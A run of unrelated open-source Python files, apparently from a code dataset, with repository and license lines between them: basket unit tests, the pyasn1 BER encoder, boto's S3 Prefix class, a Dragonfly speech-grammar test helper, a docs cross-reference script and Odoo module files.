def test_sets_line_prices(self):
line = self.basket.lines.all()[0]
self.assertEqual(line.price_incl_tax, self.purchase_info.price.incl_tax)
self.assertEqual(line.price_excl_tax, self.purchase_info.price.excl_tax)
def test_means_another_currency_product_cannot_be_added(self):
product = factories.create_product()
factories.create_stockrecord(
currency='USD', product=product, price_excl_tax=D('20.00'))
with self.assertRaises(ValueError):
self.basket.add(product)
class TestANonEmptyBasket(TestCase):
def setUp(self):
self.basket = Basket()
self.basket.strategy = strategy.Default()
self.product = factories.create_product()
self.record = factories.create_stockrecord(
self.product, price_excl_tax=D('10.00'))
self.purchase_info = factories.create_purchase_info(self.record)
self.basket.add(self.product, 10)
def test_can_be_flushed(self):
self.basket.flush()
self.assertEqual(self.basket.num_items, 0)
def test_returns_correct_product_quantity(self):
self.assertEqual(10, self.basket.product_quantity(
self.product))
def test_returns_correct_line_quantity_for_existing_product_and_stockrecord(self):
self.assertEqual(10, self.basket.line_quantity(
self.product, self.record))
def test_returns_zero_line_quantity_for_alternative_stockrecord(self):
record = factories.create_stockrecord(
self.product, price_excl_tax=D('5.00'))
self.assertEqual(0, self.basket.line_quantity(
self.product, record))
def test_returns_zero_line_quantity_for_missing_product_and_stockrecord(self):
product = factories.create_product()
record = factories.create_stockrecord(
product, price_excl_tax=D('5.00'))
self.assertEqual(0, self.basket.line_quantity(
product, record))
def test_returns_correct_quantity_for_existing_product_and_stockrecord_and_options(self):
product = factories.create_product()
record = factories.create_stockrecord(
product, price_excl_tax=D('5.00'))
option = Option.objects.create(name="Message")
options = [{"option": option, "value": "2"}]
self.basket.add(product, options=options)
self.assertEqual(0, self.basket.line_quantity(
product, record))
self.assertEqual(1, self.basket.line_quantity(
product, record, options))
class TestMergingTwoBaskets(TestCase):
def setUp(self):
self.product = factories.create_product()
self.record = factories.create_stockrecord(
self.product, price_excl_tax=D('10.00'))
self.purchase_info = factories.create_purchase_info(self.record)
self.main_basket = Basket()
self.main_basket.strategy = strategy.Default()
self.main_basket.add(self.product, quantity=2)
self.merge_basket = Basket()
self.merge_basket.strategy = strategy.Default()
self.merge_basket.add(self.product, quantity=1)
self.main_basket.merge(self.merge_basket)
def test_doesnt_sum_quantities(self):
self.assertEqual(1, self.main_basket.num_lines)
def test_changes_status_of_merge_basket(self):
self.assertEqual(Basket.MERGED, self.merge_basket.status)
class TestASubmittedBasket(TestCase):
def setUp(self):
self.basket = Basket()
self.basket.strategy = strategy.Default()
self.basket.submit()
def test_has_correct_status(self):
self.assertTrue(self.basket.is_submitted)
def test_can_be_edited(self):
self.assertFalse(self.basket.can_be_edited)
class TestMergingAVoucherBasket(TestCase):
def test_transfers_vouchers_to_new_basket(self):
baskets = [factories.BasketFactory(), factories.BasketFactory()]
voucher = factories.VoucherFactory()
baskets[0].vouchers.add(voucher)
baskets[1].merge(baskets[0])
self.assertEqual(1, baskets[1].vouchers.all().count())
| bsd-3-clause |
coolbombom/CouchPotatoServer | libs/pyasn1/codec/ber/encoder.py | 20 | 12392 | # BER encoder
from pyasn1.type import base, tag, univ, char, useful
from pyasn1.codec.ber import eoo
from pyasn1.compat.octets import int2oct, ints2octs, null, str2octs
from pyasn1 import error
class Error(Exception): pass
class AbstractItemEncoder:
supportIndefLenMode = 1
def encodeTag(self, t, isConstructed):
tagClass, tagFormat, tagId = t.asTuple() # this is a hotspot
v = tagClass | tagFormat
if isConstructed:
v = v|tag.tagFormatConstructed
if tagId < 31:
return int2oct(v|tagId)
else:
s = int2oct(tagId&0x7f)
tagId = tagId >> 7
while tagId:
s = int2oct(0x80|(tagId&0x7f)) + s
tagId = tagId >> 7
return int2oct(v|0x1F) + s
def encodeLength(self, length, defMode):
if not defMode and self.supportIndefLenMode:
return int2oct(0x80)
if length < 0x80:
return int2oct(length)
else:
substrate = null
while length:
substrate = int2oct(length&0xff) + substrate
length = length >> 8
substrateLen = len(substrate)
if substrateLen > 126:
raise Error('Length octets overflow (%d)' % substrateLen)
return int2oct(0x80 | substrateLen) + substrate
def encodeValue(self, encodeFun, value, defMode, maxChunkSize):
raise Error('Not implemented')
def _encodeEndOfOctets(self, encodeFun, defMode):
if defMode or not self.supportIndefLenMode:
return null
else:
return encodeFun(eoo.endOfOctets, defMode)
def encode(self, encodeFun, value, defMode, maxChunkSize):
substrate, isConstructed = self.encodeValue(
encodeFun, value, defMode, maxChunkSize
)
tagSet = value.getTagSet()
if tagSet:
if not isConstructed: # primitive form implies definite mode
defMode = 1
return self.encodeTag(
tagSet[-1], isConstructed
) + self.encodeLength(
len(substrate), defMode
) + substrate + self._encodeEndOfOctets(encodeFun, defMode)
else:
return substrate # untagged value
class EndOfOctetsEncoder(AbstractItemEncoder):
def encodeValue(self, encodeFun, value, defMode, maxChunkSize):
return null, 0
class ExplicitlyTaggedItemEncoder(AbstractItemEncoder):
def encodeValue(self, encodeFun, value, defMode, maxChunkSize):
if isinstance(value, base.AbstractConstructedAsn1Item):
value = value.clone(tagSet=value.getTagSet()[:-1],
cloneValueFlag=1)
else:
value = value.clone(tagSet=value.getTagSet()[:-1])
return encodeFun(value, defMode, maxChunkSize), 1
explicitlyTaggedItemEncoder = ExplicitlyTaggedItemEncoder()
class IntegerEncoder(AbstractItemEncoder):
supportIndefLenMode = 0
def encodeValue(self, encodeFun, value, defMode, maxChunkSize):
octets = []
value = int(value) # to save on ops on asn1 type
while 1:
octets.insert(0, value & 0xff)
if value == 0 or value == -1:
break
value = value >> 8
if value == 0 and octets[0] & 0x80:
octets.insert(0, 0)
while len(octets) > 1 and \
(octets[0] == 0 and octets[1] & 0x80 == 0 or \
octets[0] == 0xff and octets[1] & 0x80 != 0):
del octets[0]
return ints2octs(octets), 0
class BitStringEncoder(AbstractItemEncoder):
def encodeValue(self, encodeFun, value, defMode, maxChunkSize):
if not maxChunkSize or len(value) <= maxChunkSize*8:
r = {}; l = len(value); p = 0; j = 7
while p < l:
i, j = divmod(p, 8)
r[i] = r.get(i,0) | value[p]<<(7-j)
p = p + 1
keys = list(r); keys.sort()
return int2oct(7-j) + ints2octs([r[k] for k in keys]), 0
else:
pos = 0; substrate = null
while 1:
# count in octets
v = value.clone(value[pos*8:pos*8+maxChunkSize*8])
if not v:
break
substrate = substrate + encodeFun(v, defMode, maxChunkSize)
pos = pos + maxChunkSize
return substrate, 1
class OctetStringEncoder(AbstractItemEncoder):
def encodeValue(self, encodeFun, value, defMode, maxChunkSize):
if not maxChunkSize or len(value) <= maxChunkSize:
return value.asOctets(), 0
else:
pos = 0; substrate = null
while 1:
v = value.clone(value[pos:pos+maxChunkSize])
if not v:
break
substrate = substrate + encodeFun(v, defMode, maxChunkSize)
pos = pos + maxChunkSize
return substrate, 1
class NullEncoder(AbstractItemEncoder):
supportIndefLenMode = 0
def encodeValue(self, encodeFun, value, defMode, maxChunkSize):
return null, 0
class ObjectIdentifierEncoder(AbstractItemEncoder):
supportIndefLenMode = 0
precomputedValues = {
(1, 3, 6, 1, 2): (43, 6, 1, 2),
(1, 3, 6, 1, 4): (43, 6, 1, 4)
}
def encodeValue(self, encodeFun, value, defMode, maxChunkSize):
oid = value.asTuple()
if oid[:5] in self.precomputedValues:
octets = self.precomputedValues[oid[:5]]
index = 5
else:
if len(oid) < 2:
raise error.PyAsn1Error('Short OID %s' % value)
# Build the first twos
index = 0
subid = oid[index] * 40
subid = subid + oid[index+1]
if subid < 0 or subid > 0xff:
raise error.PyAsn1Error(
'Initial sub-ID overflow %s in OID %s' % (oid[index:], value)
)
octets = (subid,)
index = index + 2
# Cycle through subids
for subid in oid[index:]:
if subid > -1 and subid < 128:
# Optimize for the common case
octets = octets + (subid & 0x7f,)
elif subid < 0 or subid > 0xFFFFFFFF:
raise error.PyAsn1Error(
'SubId overflow %s in %s' % (subid, value)
)
else:
# Pack large Sub-Object IDs
res = (subid & 0x7f,)
subid = subid >> 7
while subid > 0:
res = (0x80 | (subid & 0x7f),) + res
subid = subid >> 7
# Add packed Sub-Object ID to resulted Object ID
octets += res
return ints2octs(octets), 0
class RealEncoder(AbstractItemEncoder):
def encodeValue(self, encodeFun, value, defMode, maxChunkSize):
if value.isPlusInfinity():
return int2oct(0x40), 0
if value.isMinusInfinity():
return int2oct(0x41), 0
m, b, e = value
if not m:
return null, 0
if b == 10:
return str2octs('\x03%dE%s%d' % (m, e == 0 and '+' or '', e)), 0
elif b == 2:
fo = 0x80 # binary enoding
if m < 0:
fo = fo | 0x40 # sign bit
m = -m
while int(m) != m: # drop floating point
m *= 2
e -= 1
while m & 0x1 == 0: # mantissa normalization
m >>= 1
e += 1
eo = null
while e:
eo = int2oct(e&0xff) + eo
e >>= 8
n = len(eo)
if n > 0xff:
raise error.PyAsn1Error('Real exponent overflow')
if n == 1:
pass
elif n == 2:
fo |= 1
elif n == 3:
fo |= 2
else:
fo |= 3
eo = int2oct(n//0xff+1) + eo
po = null
while m:
po = int2oct(m&0xff) + po
m >>= 8
substrate = int2oct(fo) + eo + po
return substrate, 0
else:
raise error.PyAsn1Error('Prohibited Real base %s' % b)
class SequenceEncoder(AbstractItemEncoder):
def encodeValue(self, encodeFun, value, defMode, maxChunkSize):
value.setDefaultComponents()
value.verifySizeSpec()
substrate = null; idx = len(value)
while idx > 0:
idx = idx - 1
if value[idx] is None: # Optional component
continue
component = value.getDefaultComponentByPosition(idx)
if component is not None and component == value[idx]:
continue
substrate = encodeFun(
value[idx], defMode, maxChunkSize
) + substrate
return substrate, 1
class SequenceOfEncoder(AbstractItemEncoder):
def encodeValue(self, encodeFun, value, defMode, maxChunkSize):
value.verifySizeSpec()
substrate = null; idx = len(value)
while idx > 0:
idx = idx - 1
substrate = encodeFun(
value[idx], defMode, maxChunkSize
) + substrate
return substrate, 1
class ChoiceEncoder(AbstractItemEncoder):
def encodeValue(self, encodeFun, value, defMode, maxChunkSize):
return encodeFun(value.getComponent(), defMode, maxChunkSize), 1
class AnyEncoder(OctetStringEncoder):
def encodeValue(self, encodeFun, value, defMode, maxChunkSize):
return value.asOctets(), defMode == 0
tagMap = {
eoo.endOfOctets.tagSet: EndOfOctetsEncoder(),
univ.Boolean.tagSet: IntegerEncoder(),
univ.Integer.tagSet: IntegerEncoder(),
univ.BitString.tagSet: BitStringEncoder(),
univ.OctetString.tagSet: OctetStringEncoder(),
univ.Null.tagSet: NullEncoder(),
univ.ObjectIdentifier.tagSet: ObjectIdentifierEncoder(),
univ.Enumerated.tagSet: IntegerEncoder(),
univ.Real.tagSet: RealEncoder(),
# Sequence & Set have same tags as SequenceOf & SetOf
univ.SequenceOf.tagSet: SequenceOfEncoder(),
univ.SetOf.tagSet: SequenceOfEncoder(),
univ.Choice.tagSet: ChoiceEncoder(),
# character string types
char.UTF8String.tagSet: OctetStringEncoder(),
char.NumericString.tagSet: OctetStringEncoder(),
char.PrintableString.tagSet: OctetStringEncoder(),
char.TeletexString.tagSet: OctetStringEncoder(),
char.VideotexString.tagSet: OctetStringEncoder(),
char.IA5String.tagSet: OctetStringEncoder(),
char.GraphicString.tagSet: OctetStringEncoder(),
char.VisibleString.tagSet: OctetStringEncoder(),
char.GeneralString.tagSet: OctetStringEncoder(),
char.UniversalString.tagSet: OctetStringEncoder(),
char.BMPString.tagSet: OctetStringEncoder(),
# useful types
useful.GeneralizedTime.tagSet: OctetStringEncoder(),
useful.UTCTime.tagSet: OctetStringEncoder()
}
# Type-to-codec map for ambiguous ASN.1 types
typeMap = {
univ.Set.typeId: SequenceEncoder(),
univ.SetOf.typeId: SequenceOfEncoder(),
univ.Sequence.typeId: SequenceEncoder(),
univ.SequenceOf.typeId: SequenceOfEncoder(),
univ.Choice.typeId: ChoiceEncoder(),
univ.Any.typeId: AnyEncoder()
}
class Encoder:
def __init__(self, tagMap, typeMap={}):
self.__tagMap = tagMap
self.__typeMap = typeMap
def __call__(self, value, defMode=1, maxChunkSize=0):
tagSet = value.getTagSet()
if len(tagSet) > 1:
concreteEncoder = explicitlyTaggedItemEncoder
else:
if value.typeId is not None and value.typeId in self.__typeMap:
concreteEncoder = self.__typeMap[value.typeId]
elif tagSet in self.__tagMap:
concreteEncoder = self.__tagMap[tagSet]
else:
baseTagSet = value.baseTagSet
if baseTagSet in self.__tagMap:
concreteEncoder = self.__tagMap[baseTagSet]
else:
raise Error('No encoder for %s' % value)
return concreteEncoder.encode(
self, value, defMode, maxChunkSize
)
encode = Encoder(tagMap, typeMap)
| gpl-3.0 |
Jgarcia-IAS/SAT | openerp/addons-extra/odoo-pruebas/odoo-server/addons/membership/__init__.py | 441 | 1101 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import membership
import wizard
import report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
serviceagility/boto | boto/s3/prefix.py | 237 | 1661 | # Copyright (c) 2006,2007 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
class Prefix(object):
def __init__(self, bucket=None, name=None):
self.bucket = bucket
self.name = name
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == 'Prefix':
self.name = value
else:
setattr(self, name, value)
@property
def provider(self):
provider = None
if self.bucket and self.bucket.connection:
provider = self.bucket.connection.provider
return provider
| mit |
synkarius/dragonfly | dragonfly/test/element_tester.py | 5 | 7355 | #
# This file is part of Dragonfly.
# (c) Copyright 2007, 2008 by Christo Butcher
# Licensed under the LGPL.
#
# Dragonfly is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Dragonfly is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with Dragonfly. If not, see
# <http://www.gnu.org/licenses/>.
#
"""
Tools for testing element classes
============================================================================
"""
import logging
from dragonfly import *
from ..test import TestError, RecognitionFailure
from ..test.infrastructure import Unique
#===========================================================================
class ElementTester(Grammar):
_log = logging.getLogger("test.element")
_NotSet = Unique("NoRecognition")
class _ElementTestRule(Rule):
exported = True
def process_recognition(self, node):
self.grammar._process_recognition(node)
#-----------------------------------------------------------------------
def __init__(self, element, engine=None):
Grammar.__init__(self, self.__class__.__name__, engine=engine)
rule = self._ElementTestRule("rule", element)
self.add_rule(rule)
def recognize(self, words):
if isinstance(words, basestring):
words = words.split()
if not self.loaded:
self._log.debug("Loading ElementTester instance.")
self.load()
unload_after_recognition = True
else:
unload_after_recognition = False
self._recognized_value = self._NotSet
try:
# Make this grammar exclusive; this *probably* avoids other
# grammars from being active and receiving the mimicked
# recognition.
self.set_exclusiveness(True)
# Mimic recognition.
try:
mimic_method = self._mimic_methods[self.engine.name]
mimic_method(self, words)
except MimicFailure, e:
self._recognized_value = RecognitionFailure
except Exception, e:
self._log.exception("Exception within recognition: %s" % (e,))
raise
except Exception, e:
self._log.exception("Exception during recognition: %s" % (e,))
raise
finally:
if unload_after_recognition:
try:
self.unload()
except Exception, e:
raise TestError("Failed to unload grammar: %s" % e)
# If recognition was successful but this grammar did not
# receive the recognition callback, then apparently some other
# grammar hijacked it; raise a TestError to signal this
# undesired situation.
if self._recognized_value == self._NotSet:
self._log.error(u"Recognition hijacked. (Words: %s)" % (words,))
raise TestError(u"Recognition hijacked. (Words: %s)" % (words,))
# Return the value of the element after recognition.
return self._recognized_value
def _process_recognition(self, node):
element_node = node.children[0]
self._recognized_value = element_node.value()
#-----------------------------------------------------------------------
# Engine-specific logic.
_mimic_methods = {}
def _mimic_natlink(self, words):
self.engine.mimic(words)
_mimic_methods["natlink"] = _mimic_natlink
def _mimic_sapi5(self, words):
import time
import win32con
from ctypes import (windll, pointer, WinError, Structure,
c_int, c_uint, c_long)
class POINT(Structure):
_fields_ = [('x', c_long),
('y', c_long)]
class MSG(Structure):
_fields_ = [('hwnd', c_int),
('message', c_uint),
('wParam', c_int),
('lParam', c_int),
('time', c_int),
('pt', POINT)]
class Obs(RecognitionObserver):
_log = logging.getLogger("SAPI5 RecObs")
status = "none"
def on_recognition(self, words):
self._log.debug("SAPI5 RecObs on_recognition(): %r" % (words,))
self.status = "recognition: %r" % (words,)
def on_failure(self):
self._log.debug("SAPI5 RecObs on_failure()")
self.status = "failure"
observer = Obs()
observer.register()
self._log.debug("SAPI5 mimic: %r" % (words,))
self.engine.mimic(words)
timeout = 10
NULL = c_int(win32con.NULL)
if timeout != None:
begin_time = time.time()
timed_out = False
windll.user32.SetTimer(NULL, NULL, int(timeout * 1000), NULL)
message = MSG()
message_pointer = pointer(message)
while (not timeout) or (time.time() - begin_time < timeout):
if timeout:
self._log.debug("SAPI5 message loop: %s sec left" % (timeout + begin_time - time.time()))
else:
self._log.debug("SAPI5 message loop: no timeout")
if windll.user32.GetMessageW(message_pointer, NULL, 0, 0) == 0:
msg = str(WinError())
self._log.error("GetMessageW() failed: %s" % msg)
raise EngineError("GetMessageW() failed: %s" % msg)
self._log.debug("SAPI5 message: %r" % (message.message,))
if message.message == win32con.WM_TIMER:
# A timer message means this loop has timed out.
self._log.debug("SAPI5 message loop timed out: %s sec left" % (timeout + begin_time - time.time()))
timed_out = True
break
else:
# Process other messages as normal.
self._log.debug("SAPI5 message translating and dispatching.")
windll.user32.TranslateMessage(message_pointer)
windll.user32.DispatchMessageW(message_pointer)
if self._recognized_value != self._NotSet:
# The previous message was a recognition which matched.
self._log.debug("SAPI5 message caused recognition.")
break
observer.unregister()
if self._recognized_value == self._NotSet:
if observer.status == "failure":
raise MimicFailure("Mimic failed.")
elif observer.status == "none":
raise MimicFailure("Mimic failed, nothing happened.")
_mimic_methods["sapi5"] = _mimic_sapi5
| lgpl-3.0 |
vipul-sharma20/oh-mainline | vendor/packages/kombu/docs/_ext/applyxrefs.py | 31 | 2136 | """Adds xref targets to the top of files."""
import sys
import os
testing = False
DONT_TOUCH = ('./index.txt', )
def target_name(fn):
if fn.endswith('.txt'):
fn = fn[:-4]
return '_' + fn.lstrip('./').replace('/', '-')
def process_file(fn, lines):
lines.insert(0, '\n')
lines.insert(0, '.. %s:\n' % target_name(fn))
try:
f = open(fn, 'w')
except IOError:
print("Can't open %s for writing. Not touching it." % fn)
return
try:
f.writelines(lines)
except IOError:
print("Can't write to %s. Not touching it." % fn)
finally:
f.close()
def has_target(fn):
try:
f = open(fn, 'r')
except IOError:
print("Can't open %s. Not touching it." % fn)
return (True, None)
readok = True
try:
lines = f.readlines()
except IOError:
print("Can't read %s. Not touching it." % fn)
readok = False
finally:
f.close()
if not readok:
return (True, None)
#print fn, len(lines)
if len(lines) < 1:
print("Not touching empty file %s." % fn)
return (True, None)
if lines[0].startswith('.. _'):
return (True, None)
return (False, lines)
def main(argv=None):
if argv is None:
argv = sys.argv
if len(argv) == 1:
argv.extend('.')
files = []
for root in argv[1:]:
for (dirpath, dirnames, filenames) in os.walk(root):
files.extend([(dirpath, f) for f in filenames])
files.sort()
files = [os.path.join(p, fn) for p, fn in files if fn.endswith('.txt')]
#print files
for fn in files:
if fn in DONT_TOUCH:
print("Skipping blacklisted file %s." % fn)
continue
target_found, lines = has_target(fn)
if not target_found:
if testing:
print '%s: %s' % (fn, lines[0]),
else:
print "Adding xref to %s" % fn
process_file(fn, lines)
else:
print "Skipping %s: already has a xref" % fn
if __name__ == '__main__':
sys.exit(main())
| agpl-3.0 |
kybriainfotech/iSocioCRM | addons/l10n_be_hr_payroll_account/__openerp__.py | 298 | 1626 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2011 OpenERP SA (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Belgium - Payroll with Accounting',
'category': 'Localization',
'author': 'OpenERP SA',
'depends': ['l10n_be_hr_payroll', 'hr_payroll_account', 'l10n_be'],
'version': '1.0',
'description': """
Accounting Data for Belgian Payroll Rules.
==========================================
""",
'auto_install': True,
'website': 'https://www.odoo.com/page/accounting',
'demo': [],
'data':[
'l10n_be_wizard.yml',
'l10n_be_hr_payroll_account_data.xml',
'data/hr.salary.rule.csv',
],
'installable': True
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.